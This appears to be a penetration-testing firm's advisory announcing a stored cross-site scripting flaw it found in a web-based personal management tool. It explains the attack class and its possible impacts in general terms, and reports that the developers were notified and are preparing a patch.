Product Name: PMS by Volmarg
Vulnerability: XSS
Vulnerable Version: Will be disclosed soon
CVE: Will be disclosed soon
On February 28, 2024, our team of pentesters at Astra discovered a critical stored XSS or cross-site scripting vulnerability in the Personal Management System by Volmarg. This web-based tool helps you create to-do lists, take notes, and manage files in a convenient dashboard.
Also known as a persistent or second-order XSS vulnerability, it occurs when an application fails to properly sanitize user-provided data before storing it and later displaying it to other users.
How does a Stored XSS Vulnerability Occur?
Stage 1: Injection:
An attacker introduces malicious code into the application’s data. This can be done in various ways, such as:
- Input fields: Injecting code into forms, search boxes, or other input fields.
- Uploading files: Embedding code within uploaded files.
- Modifying database entries: Directly altering database records to include malicious code.
Stage 2: Storage:
The malicious code is stored within the application’s data storage, such as databases, file systems, or cookies or session data.
Stage 3: Retrieval and Execution:
When a user visits a page that retrieves and displays this stored data, the malicious code is executed within the user’s browser context. This can lead to a variety of harmful consequences, including:
- Stealing cookies: The attacker can obtain sensitive information like session tokens or user credentials.
- Redirecting users: The attacker can redirect users to malicious websites.
- Executing arbitrary code: The attacker can execute arbitrary JavaScript code on the user’s machine.
Impact of Stored XSS Vulnerability
1. Data Theft and Session Hijacking
- Cookie Stealing: Malicious scripts can extract sensitive cookies, such as authentication tokens, allowing attackers to gain unauthorized access to your account.
- User Information Exfiltration: Personal data, including names, addresses, and financial information of your clients and third parties, can be stolen and used for identity theft or other criminal activities.
- Session Hijacking: By compromising a user’s session, attackers can hijack their browsing session, potentially leading to unauthorized actions on their behalf.
2. Malware and Ransomware Propagation
- Malware Downloads: Such scripts can trigger the download of malware, such as viruses, trojans, or spyware, onto your devices and networks.
- Ransomware Deployment: Attackers can use stored XSS to deliver ransomware, which encrypts your data to demand a ransom for its decryption.
- Browser Exploitation: Infected code snippets can exploit vulnerabilities in your browser to deliver malware payloads, bypassing security measures.
3. Website Defacement
- Content Alteration: Malicious scripts can modify the content of your web pages, replacing legitimate content with harmful or misleading information.
- Layout Changes: Attackers can manipulate your website’s layout and appearance, making it difficult for users to navigate or identify malicious content.
- Unwanted Ads: Compromised scripts can inject unwanted advertisements or pop-ups onto your web pages, disrupting the user experience and potentially damaging your website’s reputation.
Current Status
Upon discovering the vulnerability in the Personal Management System, we promptly notified the platform’s developers, providing possible solutions, such as input sensitization, output encoding (HTML encoding) at the server side, and more, that they may implement to avoid any potential exploitation of user data.
Currently, they are working on implementing a patch while formulating a long-term solution for the vulnerability.
What can you do?
Update the affected version to the latest version once released by the Personal Management System team.